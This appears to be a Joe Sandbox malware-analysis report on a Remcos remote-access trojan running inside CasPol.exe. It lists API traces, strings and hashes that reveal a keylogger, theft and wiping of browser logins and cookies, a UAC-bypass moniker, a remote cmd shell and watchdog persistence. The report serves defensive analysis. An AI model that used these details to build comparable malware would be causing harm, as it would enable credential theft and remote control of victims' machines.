                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  APIs
                                                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Startup
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 724789610-0
                                                                                                                  APIs
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: recv
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1507349165-0
                                                                                                                  APIs
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: send
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2809346765-0
                                                                                                                  APIs
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Deallocate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1075933841-0
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  APIs
                                                                                                                  • SetEvent.KERNEL32(?), ref: 00406F28
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                    • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                    • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                    • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                    • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                    • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                    • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                    • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                    • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                    • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                    • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                    • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                    • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                  Strings
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                  • API String ID: 2918587301-599666313
                                                                                                                  APIs
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                    • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                    • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                  • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                  • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                                    • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                    • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                  • Sleep.KERNEL32(0000012C,00000093), ref: 0040523F
                                                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                    • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                  Strings
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                  • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                  • API String ID: 3815868655-1274243119
APIs
• GetCurrentProcessId.KERNEL32 ref: 00410F45
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
• CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
• CloseHandle.KERNEL32(00000000), ref: 00410F90
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
• String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
• API String ID: 65172268-860466531
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
• FindClose.KERNEL32(00000000), ref: 0040B3CE
• FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
• FindClose.KERNEL32(00000000), ref: 0040B517
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
• FindClose.KERNEL32(00000000), ref: 0040B5CC
• FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
• FindClose.KERNEL32(00000000), ref: 0040B6B2
• FindClose.KERNEL32(00000000), ref: 0040B6D1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
• API String ID: 726551946-3025026198
APIs
• OpenClipboard.USER32 ref: 004159C7
• EmptyClipboard.USER32 ref: 004159D5
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
• GlobalLock.KERNEL32(00000000), ref: 004159FE
• GlobalUnlock.KERNEL32(00000000), ref: 00415A34
• SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
APIs
• GetForegroundWindow.USER32 ref: 00409B3F
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
• GetKeyboardLayout.USER32(00000000), ref: 00409B52
• GetKeyState.USER32(00000010), ref: 00409B5C
• GetKeyboardState.USER32(?), ref: 00409B67
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: X[G
• API String ID: 1888522110-739899062
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00406788
                                                                                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Object_wcslen
                                                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                  • API String ID: 240030777-3166923314
                                                                                                                  • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                  • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                                  • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                  • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                                  • GetLastError.KERNEL32 ref: 00419945
                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3587775597-0
                                                                                                                  • Opcode ID: 9221a97e37ce63e1dfc2a590e15a2d383158a23c63d16956968e5530d48b3d55
                                                                                                                  • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                                  • Opcode Fuzzy Hash: 9221a97e37ce63e1dfc2a590e15a2d383158a23c63d16956968e5530d48b3d55
                                                                                                                  • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                                                                                                    • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2341273852-0
                                                                                                                  • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                  • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                  • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                  • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                  • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                  • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                  • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                  Strings
                                                                                                                  • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                  • String ID: Keylogger initialization failure: error
                                                                                                                  • API String ID: 3219506041-952744263
                                                                                                                  • Opcode ID: 8a150b850c40751c4d3c51e8045edfae491f6e30bd8adda2b22654e8f725d179
                                                                                                                  • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                  • Opcode Fuzzy Hash: 8a150b850c40751c4d3c51e8045edfae491f6e30bd8adda2b22654e8f725d179
                                                                                                                  • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413026
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                  • API String ID: 2127411465-314212984
                                                                                                                  • Opcode ID: 62864654b4172c23c36bd298797ba6ffba39aa4c150a1d12abcd8472de587f0f
                                                                                                                  • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                  • Opcode Fuzzy Hash: 62864654b4172c23c36bd298797ba6ffba39aa4c150a1d12abcd8472de587f0f
                                                                                                                  • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                  APIs
                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                  • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                  Strings
                                                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                  • UserProfile, xrefs: 0040B227
                                                                                                                  • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                                  • Opcode ID: 7ecc4e94247dd75e85f2eb484a84449b95e5f3b3bb19d81e9f11951ce067ef14
                                                                                                                  • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                  • Opcode Fuzzy Hash: 7ecc4e94247dd75e85f2eb484a84449b95e5f3b3bb19d81e9f11951ce067ef14
                                                                                                                  • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                  • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                  • API String ID: 3534403312-3733053543
                                                                                                                  • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                  • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
